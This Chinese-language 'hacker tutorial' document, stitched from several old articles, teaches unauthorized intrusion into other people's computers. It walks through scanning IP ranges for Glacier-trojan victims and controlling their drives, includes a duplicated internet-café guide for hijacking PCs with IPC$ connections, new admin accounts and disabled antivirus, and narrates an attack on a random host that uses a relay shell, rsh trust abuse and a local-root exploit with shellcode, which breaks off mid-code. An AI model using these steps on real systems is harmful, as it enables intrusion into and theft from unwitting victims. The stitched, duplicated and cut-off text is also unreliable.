黑客电脑教程.docx
《黑客电脑教程.docx》由会员分享,可在线阅读,更多相关《黑客电脑教程.docx(18页珍藏版)》请在冰豆网上搜索。
黑客电脑教程
如何一步一步进入别人计算机!
跟着TTY一步一步走进对方计算机:
这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的,主要使用的软件就是著名的国产木马冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了。
其他有兴趣的网络新手们,Let'sgo!
第一步下载网络新手快餐软件包tty.zip到网络休闲庄()“红客软件”->>“中文软件”里下载网络新手快餐软件包,文件名是:
tty.zip。
该软件包里准备了本次实验所需的所有软件,大小811K。
解开tty.zip,里面应有1号、2号、两个软件,是为了叙述方便而编的号,1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。
下载完毕并解压缩之后跟我进行第二步!
第二步
运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。
第三步在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。
第四步进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。
“端口”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?
如果一切OK,请点击“开始搜索”。
第五步观察“总进度”和“段进度”是否在走动。
如果没有走动,那一定是IP地址设置不对,请认真检查。
如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。
下面你要作的就是静静的等待,学用黑客软件是需要耐心的。
大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。
每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。
第六步点击“停止搜索”,但不要退出程序,到第十二步时还要用。
运行2号软件冰河,进入冰河主界面。
选“文件[F]”-》“添加主机[A]”进入添加主机窗口。
第七步在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。
“访问口令”不填,“监听端口”保持默认的7626。
好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。
第八步这一步和下一步最重要,请认真看清楚!
在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。
比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:
、D:
、E:
、F:
,如果你的硬盘分的是两个区,就会出现C:
、D:
。
第九步点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。
看到了吗?
看到了?
呵呵,祝贺你,你已经成功地进入对方的计算机了!
!
!
!
!
第十步TTY,没有出现对方计算机的硬盘分区!
!
!
!
呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址:
1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃!
2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!
!
第十一步如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的操作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。
第十二步如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机,呵呵,那是你的运气太差!
别急,这样的运气TTY是经常碰到的!
再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!
!
呵呵,等吧!
!
搜索吧!
!
TTY说过,只要你有时间,你一定能成功!
!
!
第十三步哇!
!
TTY!
!
终于成功了,!
!
我见到对方计算机硬盘分区了!
!
!
呵呵,怎么样?
你成功了,我的任务完成了!
!
ByeBye!
!
进入对方计算机后,所有的操作和自己计算机“文件管理器”里的操作一模一样!
!
!
作者:
TTYOICQ1506414主页
二○○○年十月于网络休闲庄
本文首刊电子邮件杂志《网络休闲庄》第七期
打开注册表编辑器,找到:
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon,在右边窗口点击右键—>新建—>字符串值,然后为它命名:
“LegalNoticeCaption”,接着点击右键—>新建—>字符串值,为其命名为:
“LegalNoticeText”,双击“LegalNoticeCaption”,然后输入你想在登录窗口显示的标题(比如:
有毒!
请勿进入!
),双击“LegalNoticeText”,输入你想在登录对话框中显示的文字(比如:
本机感染恶性病毒,请不要进入,否则后果自负!
)。
这样,以后如果某个人想启动你的电脑,这个由你定制的新对话框就会在登录系统前显示出来。
建议你最好为系统再加上登录密码,要不然胆大的人点击确定,也能够直接进入系统。
如何入侵别人电脑
在这里告诉大家如何入侵别人电脑,从而演绎我们那在别人电脑上无所不能的神话…
首先要确定要入侵电脑的IP,关于IP,网吧的编号和IP地址通常是相同或高一位,比如编号为
20的电脑,IP一般是192.168.0.20或192.168.0.21…?
?
大家要是上贴吧匿名发帖子的话,也会
看见IP地址…
有了IP地址后,就可以连接那将被你入侵的倒霉电脑了,一般登陆电脑的用户名多是“user编号”
的形式空密码形式,所以在“命令提示符”下输入net?
use?
//IP地址/ipc$""/user:
""及
net?
use?
//IP地址/ipc$""/user:
"user编号"命令进行连接
连接成功后必须关闭对方电脑的杀毒软件,右击“我的电脑”,选择“管理”在弹出窗口中右击
“计算机管理(本地)”,选择“连接另一台计算机”,连接至那台倒霉电脑的IP号,启动
“Tenlet”服务
然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。
net?
user?
user编号/add
net?
localgroup?
administators?
user编号/add
然后进入C:
\Winnt\System32,右击CMD.EXE,选择“创建快捷方式”,然后右击快捷方式,选择
“属性”,选择“以其他用户身份运行”,运行快捷方式CMD,弹出“以其他用户身份运行”窗
口后,输入“user编号”回车
用telnet?
电脑IP编号?
登陆至那个倒霉孩子的电脑,再从网上下载一个命令行下杀进程的软件,
比如说knlps等,在telnet上将杀毒软件进程关闭
这样就OK了
做你想做的事吧……,呵呵…,有兴趣的…试试
有兴趣的去我空间,我Q292413458,呵呵…空间里都是电脑应用如何入侵别人电脑
在这里告诉大家如何入侵别人电脑,从而演绎我们那在别人电脑上无所不能的神话…
首先要确定要入侵电脑的IP,关于IP,网吧的编号和IP地址通常是相同或高一位,比如编号为
20的电脑,IP一般是192.168.0.20或192.168.0.21…?
?
大家要是上贴吧匿名发帖子的话,也会
看见IP地址…
有了IP地址后,就可以连接那将被你入侵的倒霉电脑了,一般登陆电脑的用户名多是“user编号”
的形式空密码形式,所以在“命令提示符”下输入net?
use?
//IP地址/ipc$""/user:
""及
net?
use?
//IP地址/ipc$""/user:
"user编号"命令进行连接
连接成功后必须关闭对方电脑的杀毒软件,右击“我的电脑”,选择“管理”在弹出窗口中右击
“计算机管理(本地)”,选择“连接另一台计算机”,连接至那台倒霉电脑的IP号,启动
“Tenlet”服务
然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。
net?
user?
user编号/add
net?
localgroup?
administators?
user编号/add
然后进入C:
\Winnt\System32,右击CMD.EXE,选择“创建快捷方式”,然后右击快捷方式,选择
“属性”,选择“以其他用户身份运行”,运行快捷方式CMD,弹出“以其他用户身份运行”窗
口后,输入“user编号”回车
用telnet?
电脑IP编号?
登陆至那个倒霉孩子的电脑,再从网上下载一个命令行下杀进程的软件,
比如说knlps等,在telnet上将杀毒软件进程关闭
这样就OK了
做你想做的事吧……,呵呵…,有兴趣的…试试
有兴趣的去我空间,我Q292413458,呵呵…空间里都是电脑应用
本文的写作目的仅仅是为了给某些粗心大意的网络管理人员一个警告——internet是有趣但十分脆弱的,当你的计算机放在互联网上给人们提供信息与服务的同时,会引来网络中的“好奇者”的窥探。
而安全性与便利性是一对矛盾……在你对自己的网络做了一个安全策略考量之后,你应该确定你愿意以多大的风险来使用一些方便的服务,当然这些服务——比如rlogin,可能只会使你少输入一次密码……
首先是确定目标——撞大运乱挑一个吧,试试能不能成功……呵,于是登上yahoo,上taiwan的站点小遛了一下……唔,这个还不错,我们姑且称其为
……还是先ping一下看看情势如何——别碰上有墙的就逊了……
C:
\>ping
Pinging
[111.111.111.111]with32bytesofdata:
Replyfrom111.111.111.111:
bytes=32time=621msTTL=241
Replyfrom111.111.111.111:
bytes=32time=620msTTL=241
Replyfrom111.111.111.111:
bytes=32time=611msTTL=241
Replyfrom111.111.111.111:
bytes=32time=591msTTL=241
速度还是很快的嘛……那就开始吧……
先登上某台跳板台湾的机器——这样安全一些,不会留下你自己的IP……(当然,说句题外话——这样要追查到还不是很困难,曾经有个朋友同我说过,南方某大学一次被黑,种种迹象都表明黑客来自美国,IP、更改后主页上留下的话语……朋友受托去补漏查源,发现那IP是美国一个提供免费shell的服务供应商……于是申请了一个shell,通过一系列动作成为root,查看系统日志——真相大白,IP居然指向那家大学自身)。
通过跳板还有一个好处——如果你的尝试失败,在系统日志里留下来的是台湾本土的IP,这样的登陆失败命令比较不会引起系统管理员的注意……
C:
\>nc***.***.***.***12345
就登上跳板了,12345端口里我预留了一个suid的shell……
好了,祭起宝刀——nmap……
#./nmap-sT-O111.111.111.111
StartingnmapV.2.3BETA12byFyodor(
fyodor@
www.insecure.org/nmap/
)
Interestingportson
(111.111.111.111):
PortStateProtocolService
7opentcpecho
9opentcpdiscard
19opentcpchargen
21opentcpftp
23opentcptelnet
25opentcpsmtp
37opentcptime
79opentcpfinger
80opentcphttp
111opentcpsunrpc
443opentcphttps
512opentcpexec
513opentcplogin
514opentcpshell
515opentcpprinter
540opentcpuucp
3306opentcpmysql
TCPSequencePrediction:
Class=randompositiveincrements
Difficulty=55346(Worthychallenge)
NoOSmatchesforhost(IfyouknowwhatOSisrunningonit
…………
…………
Nmapruncompleted--1IPaddress(1hostup)scannedin17seconds
唔,运气还不错,提供的服务不少,估计漏也少不到哪儿去……只是没判断出系统
类型,这些服务里看上去可以利用的有:
PortStateProtocolService
21opentcpftp
25opentcpsmtp
79opentcpfinger
80opentcphttp
111opentcpsunrpc
512opentcpexec
513opentcplogin
514opentcpshell
540opentcpuucp
3306opentcpmysql
最近rpc攻击非常流行,原因之一恐怕是方便易行——只要存在漏洞,远程就可以
得到一个rootshell……甚至对计算机完全不懂的外行也能轻易实施,呵,那咱们
来看看这个111port的sunrpc里有什么奥妙吧……
#rpcinfo-p111.111.111.111&
21404
#programversprotoportservice
1000002tcp111rpcbind
1000002udp111rpcbind
咦,看来没戏唱哦……好在还有那么多服务,待偶慢慢试来……
看看是什么FTP服务器软件吧,说不定有远程溢出的漏洞呢
#./nc111.111.111.11121
#
乖乖龙的东,什么输出也没有就关上了,这是如何一回事?
C:
\>ftp111.111.111.111
Connectedto111.111.111.111.
Connectionclosedbyremotehost.
呵呵,看来过滤掉了嘛……怎么办?
看看25端口是运行什么SMTP服务的吧……
#./nc111.111.111.11125
220***-***-***-***ESMTPSendmail8.9.3/8.9.3;Wed,5Apr200008:
56:
59GMT
Sendmail8.9.3/8.9.3?
好象没有什么致命的漏洞呀……
看看是什么WEB服务器先……
#(echo"head/http/1.0";echo;echo)|./nc-w3111.111.111.11180
501MethodNotImplemented
MethodNotImplemented
headto/http/1.0notsupported.
Invalidmethodinrequesthead/http/1.0
Apache/1.3.9Serverat***-***-***-***Port80
阿帕奇这个版本的东东至少偶的印象中没有什么“死穴”……
好在开了finger,俺就土土地先把用户列表弄出来吧……
finger
O@
[]
root
aaa
bbb
ccc
ddd
总算有点收获……,那么下一步该做什么呢?
既然这台主机开了512、513、514的r系列服务,那就值得尝试一下,说不定哪个偷懒的家伙直接在.rhosts里设了+username
那我就爽了……
顺手写了个shellscript,让它去一个一个地尝试rsh命令,传到肉鸡上
#chmod700rsh.sh
#nohup./rsh.sh
它会自动地在/etc/passwd和/etc/shadow里加上finger出来的用户名,然后su过去,再对远程目标111.111.111.111执行rsh命令,成功则返回该用户名……然后将备份的passwd和shadow再拷回去……删除临时文件,生成报告文件……(或许是我对.rhosts的理解还有问题,有时我在机里加上++但rcp时还会报Permissiondenied或者connectrefused,所以干脆都su成用户——或许太笨;)我便再去MUD里当我的大虾了……半个小时后回来,登上肉鸡,读取报告文件.rsh.txt
#cat./.rsh.txt
ccc
hehe,非常抱歉,看来俺得到一个shell了……
进去看看……
#rlogin-lccc111.111.111.111
Lastlogin:
FriMar2419:
04:
50from202.102.2.147
Copyright(c)1980,1983,1986,1988,1990,1991,1993,1994
TheRegentsoftheUniversityofCalifornia.Allrightsreserved.
FreeBSD3.2-RELEASE(GENERIC)#0:
TueMay1804:
05:
08GMT1999
Youhavemail.
呵,原来是FreeBSD3.2-RELEASE呀,感觉不错,进来了,看看我的权限如何吧……
>id
id
uid=1003(ccc)gid=1003(ccc)groups=1003(ccc)
看来能做的事还相当有限噢……再看看系统里有没有别人先……
>w
w
9:
03PMup6days,2:
37,3users,loadaverages:
0.00,0.01,0.00
USERTTYFROMLOGIN@IDLEWHAT
cccp0**.**.***.***6:
04PM2:
41-tcsh(tcsh)
不错,就我自在逍遥……看看passwd吧……
>cat/etc/passwd
cat/etc/passwd
root:
*:
0:
0:
Charlie&:
/root:
/usr/local/bin/bash
aaa:
*:
1005:
2000:
:
/home/www:
/usr/local/bin/tcsh
bbb:
*:
1006:
1006:
:
/home/bbb:
/usr/local/bin/tcsh
ccc:
*:
1003:
1003:
:
/home/ccc:
/usr/local/bin/tcsh
ddd:
*:
1008:
1008:
ddd:
/home/www:
/usr/local/bin/tcsh
eee:
*:
1009:
1009:
eee:
/home/eee:
/usr/local/bin/tcsh
很明显/home/www就是www用户的主目录了……先看看俺ccc对该目录有没有写权限
>echotest>/home/www/test
test:
Permissiondenied.
看来如果想改他的主页,还得另外想办法啦……不过都已经有了一个用户shell了,最高权限其实也只有一步之遥啦,好吧,翻翻数据库里有什么关于FreeBSD3.2的记录,看来东西不多呀……而且有些还是安装外来软件包之后才带来的风险……
先看看有没有编译的权限再说吧,否则还得找一台BSD来编译……
>ls/usr/local/bin|grepgcc
gcc
一般情况下自己安装的gcc是会在这个目录的啦,否则最好find一下比较保险。
这下方便了……可以直接传代码上来试……试了几个之后我找到这么个东西:
/*byNergal*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
charshellcode[]=
"\xeb\x0a\x62\x79\x20\x4e\x65\x72\x67\x61\x6c\x20"
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04\x00";
#definePASSWD"./passwd"
void
sg(intx)
{
}
int
main(intargc,char**argv)
{
unsignedintstack,shaddr;
intpid,schild;
intfd;
charbuff[40];
unsignedintstatus;
char*ptr;
charname[4096];
charsc[4096];
charsignature[]="signature";
signal(SIGUSR1,sg);
if(symlink("usr/bin/passwd",PASSWD)&&errno!
=EEXIST)
{
perror("creatingsymlink:
");
exit
(1);
}
shaddr=(unsignedint)&shaddr;
stack=shaddr-2048;
if(argc>1)
shaddr+=atoi(argv[1]);
if(argc>2)
stack+=atoi(argv[2]);
fprintf(stderr,"shellc